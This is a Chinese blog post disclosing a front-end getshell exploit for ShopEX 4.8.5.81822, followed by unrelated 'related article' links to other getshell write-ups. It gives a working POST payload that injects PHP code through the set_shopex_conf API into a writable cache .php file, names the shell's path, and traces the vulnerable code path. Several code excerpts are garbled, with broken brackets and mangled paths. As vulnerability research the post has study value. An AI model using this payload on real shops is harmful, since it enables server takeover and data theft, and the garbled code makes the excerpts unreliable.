ShopEX 4.8.5.81822 前台Getshell

作者:unhonker   发布:2014-06-23 00:12   分类:漏洞公布   被撸:8,179次   抢沙发  
 

利用方式:
Post提交

Post Data

conf_key=<!--?php phpinfo();?-->.yyyyy&amp;conf_val=test

http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&amp;api_version=5.0

Shell地址:

http://127.0.0.1/shopex-single-4.8.5.81822/home/cache/cachedata.stat.php

提交后:

漏洞成因(解密后的代码错乱,只看关键的,无关代码已经略去)

http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0

api.php中10-11行

        require(CORE_DIR.'/api/shop_api.php');

        $system = new shop_api();

core/api/shop_api.php中

<?php

require_once( CORE_DIR."/kernel.php" );

require_once( CORE_DIR."/func_ext.php" );

class shop_api extends kernel

{

/**省略**/

        public function shop_api( )

    {

                $apiAct = $_REQUEST['act'];

        $APIs = include( CORE_DIR."/api/include/api_link.php" );

        $apiVersion = $_REQUEST['api_version' ) && $APIs[$apiAct][$apiVersion];

        $api = $APIs[$apiAct][$apiVersion];

                if(!$APIs[$apiAct][$apiversion]['n_varify' && !$this->verfy($_POST)){

            $this->error_handle('veriy fail');//n_varify=1,不需要经过verfy()函数处理

                }

        include( CORE_DIR."/api/shop_api_object.php" );

                include( CORE_DIR."/".dirname( $ctl )."/".$apiVersion."/".basename( $ctl ).".php" );

        $ctl = basename( $ctl );

        $act = $api['act'];

        if ( !class_exists( $ctl ) || !( $ctlObj = new $ctl( ) ) || !method_exists( $ctlObj, $act ) )

        {

            $this->error_handle( "service error", "can not service" );

        }

        /***下面应该是调用set_shopex_conf函数***/

        $ctlObj->$act($_POST);

        /**省略**/

    }

/**省略**/

?>

访问[url]http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0[/url]即调用coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

conf_key=<?php phpinfo();?>.yyyyy&conf_val=test

访问[url]http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&api_version=5.0[/url]即调用coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

core/api/include/api_link.php中

$APIs['set_shopex_conf']=Array ( [5.0 => Array ( [ctl => api/site/api_5_0_site [act => set_shopex_conf [n_varify => 1 ) ); n_varify=1,不需要经过verfy()函数处理

coreapisite5.0api_5_0_site.php中的set_shopex_conf函数

public function set_shopex_conf( $data )

    {

        error_log( var_export( $data, 1 ), 3, __FILE__.( ".log" ) );//写入了coreapisite5.0api_5_0_site.php.log

        $this->system->setConf( $data['conf_key'], $data['conf_val' );//即setConf('<?php phpinfo();?>.yyyyy','test');

        $this->api_response( "true", false, "succ" );

    }

corekernel.php中

    public function setConf( $key, $data, $immediately = false )

    {

        return $this->__setting->set( $key, $data, $immediately );

        /***省略***/

    }

coreinclude_v5setmgr.php中

public function set( $key, $value, $immediately = false )//即set('<?php phpinfo();?>.yyyyy','test');

    {

        if ( !( $pos = strpos( $key, "." ) ) )

        {

            return;

        }

        $sub = substr( $key, $pos + 1 );

        if ( "*" == $sub )

        {

            $this->_pool[substr( $key, 0, $pos = $value;

        }

        else

        {

            $this->_pool[substr( $key, 0, $pos )][$sub = $value;//$this->_pool['<?php phpinfo();?>']['yyyyy']='test';

        }

        if ( $immediately )

        {

            return $this->_save( );

        }

        register_shutdown_function( array( $this, "_save" ) );//脚本执行完成时将调用_save函数[url]http://www.php.net/manual/zh/fun[/url] ... utdown-function.php

        return true;

    }

coreinclude_v5setmgr.php中

public function _save( )

    {

        $db =& $this->system->database( );

        $vary = array( );

        foreach ( $this->_pool as $domain => $values )

        {

            $this->_bool_data_varify( $domain.".".key( $values ), $values );

            $rs = $db->quote( $domain )( "select * from sdb_settings where s_name=".$db->quote( $domain ) );

            $row = $db->getRows( $rs );

            $data = unserialize( $row[0]['s_data' );

            $values = $data ? array_merge( $data, $values ) : $values;

            $send = array( "s_name" => $domain, "s_data" => $values, "s_time" => time( ) );

            $sql = $db->getUpdateSql( $rs, $send, true );

            if ( $sql )

            {

                $db->exec( $sql );

            }

            $vary["SETTING_".$domain = 1;

        }

        $this->system->cache->setModified( array_keys( $vary ) );//调用此函数将$this->_pool数组的键名写入到home/cache/cachedata.stat.php中

        return true;

    }

pluginsfunctionscache_secache.php中

    function cache_secache(){

        $this->workat(HOME_DIR.'/cache/cachedata');

        $statfile = HOME_DIR.'/cache/cachedata.stat.php';

        if(file_exists($statfile)){

            $this->_stat_rs = fopen($statfile,'rb+');

            $contents = '';

            while (!feof($this->_stat_rs)) {

                $contents .= fread($this->_stat_rs, 4096);

            }

            $this->_vary_list = unserialize($contents);

        }else{

            $this->_stat_rs = fopen($statfile,'wb+');

            $this->_vary_list = array();

        }

    }

function setModified($key){

        $now = time();

        if(is_array($key)){

            foreach($key as $k){

                $this->_vary_list[strtoupper($k = $now;

            }

        }else{

            $this->_vary_list[strtoupper($key = $now;

        }

        fseek($this->_stat_rs,0);

        ftruncate($this->_stat_rs,0);

        return fputs($this->_stat_rs,serialize($this->_vary_list));//最终写入到 home/cache/cachedata.stat.php

    }

home/cache/cachedata.stat.php开头没有一共写到两个文件
/core/api/site/5.0/api_5_0_site.php.log 此处apache配置不当的话也可能会当作php解析
/home/cache/cachedata.stat.php

ShopEX 4.8.5.81822 前台Getshell的更多相关文章

  1. phpcms v9 前台getshell脚本

    phpcms v9 前台getshell脚本 用法:python phpcmsv9getshell.py http://baidu.com # -*- coding:utf-8 -*- ''' --- ...

  2. PHP7CMS 无条件前台GETSHELL

    PHP7CMS 无条件前台GETSHELL Version:2018-10-09 //最新版中以修复此漏洞 这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的.   01 0 ...

  3. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  4. PHPCMS9.6.0最新版SQL注入和前台GETSHELL漏洞分析 (实验新课)

    PHPCMS9.6.0最新版中,由于/modules/attachment/attachments.php的过滤函数的缺陷导致了可以绕过它的过滤机制形成SQL注入漏洞,可导致数据库中数据泄漏. 而且在 ...

  5. 利用Thinkphp 5缓存漏洞实现前台Getshell

    0×00 背景 网站为了实现加速访问,会将用户访问过的页面存入缓存来减小数据库查询的开销.而Thinkphp5框架的缓存漏洞使得在缓存中注入代码成为可能.(漏洞详情见参考资料) 本文将会详细讲解: 1 ...

  6. phpcms9 从注入点入手和 从前台getshell

    弄了3天了  这个点 总结一下这三天的坑吧 0X01 注入点入手 /index.php?m=wap&c=index&a=init&siteid=1 获取cookie 传给 us ...

  7. ThinkSNS2.5前台getshell+后台任意文件删除

    12年爆出的一个洞 前几天比赛的一个cms  于是跟出题人表哥要过来审计了看看 漏洞文件再根目录thumb.php中 <?php /* * 自动缩略图 参数 url|w|h|type=" ...

  8. [代码审计]某开源商城前台getshell

    0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来. 下面就分享一下自己审这套系统的整个过程. 0x01 系统简介 略   0x02 审计入口 看到inc\functi ...

  9. 代码审计之seacms v6.54 前台Getshell 复现分析

    1.环境: php5.5.38+apache+seacms v6.54 上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加: $order = ( ...

随机推荐

  1. 用提交按钮提交form问题验证没通过依然提交表单

    <form id="sb" action="${pageContext.request.contextPath }/admin/loanContract/addOr ...

  2. ODBC接口规范

    第1章     ODBC API基础 1.1 ODBC API句柄 ODBC API 实现数据库操作的手段是句柄.在ODBC中,使用不同的句柄(HANDLE)来标志环境(environment).连接 ...

  3. JAVA学习之Ecplise IDE 使用技巧(1)第一章:我的地盘我做主,工作空间

    麦子学院/Andriod应用开发/第一阶段 Android 学前准备 第三课:Eclipse IDE 使用技巧 由马一鸣老师讲解.感谢麦子学院免费开放这部分视频资源. Eclipse由IBM开发的,2 ...

  4. 8个节点MySQL-cluster安装和配置,含两个管理节点

    换装jdk [root@clusterdata1 software]# rpm -qa | grep javajava-1.6.0-openjdk-1.6.0.0-1.50.1.11.5.el6_3. ...

  5. Codeforces Round #297 (Div. 2)

    A题 题目大意: 给你一个字符串,奇数的时候是钥匙,偶数的时候是门,一把钥匙只能开对应的门,然后问你最少额外需要多少把钥匙. 分析: 用的数组记录一下就行,(注意的是先开门,再拿钥匙!开始错在这里了, ...

  6. UDP 打洞 原理解释

    终于找到了一份满意的UDP打洞原理解释,附上正文,自己整理了一下源码 3.3. UDP hole punching UDP打洞技术 The third technique, and the one o ...

  7. CMOS、BIOS

    CMOS主要的功能为记录主板上面的主要参数,包括系统时间.CPU电压与频率.各项设备的I/O地址与IRQ等,由于这些数据的记录要花费电力,因此主板上面才有电池. BIOS为写入到主板上某一块闪存或EE ...

  8. ZOJ 1041 Transmitters

    原题链接 题目大意:有一个发射站,覆盖范围是半径一定的一个半圆.在一个1000*1000平方米的地盘里有很多接收站.给定发射站的圆心,求最佳角度时能覆盖接收站的个数. 解法:本质上就是给一个原点和其他 ...

  9. php部分---面向对象,设计模式(单例模式、工厂模式)、oop六大原则;

    一.单例模式目的:为了控制对象的数量(只能够有一个,相当于类的计划生育)做法1.将类的构造函数做成私有的2.在类里面做了一个公有的函数来造对象3.将该函数变为静态的4.在函数里面加控制 class R ...

  10. Codeforces Round #113 (Div. 2)

    Codeforces Round #113 (Div. 2) B. Polygons 题意 给一个\(N(N \le 10^5)\)个点的凸包 \(M(M \le 2 \cdot 10^4)\)次询问 ...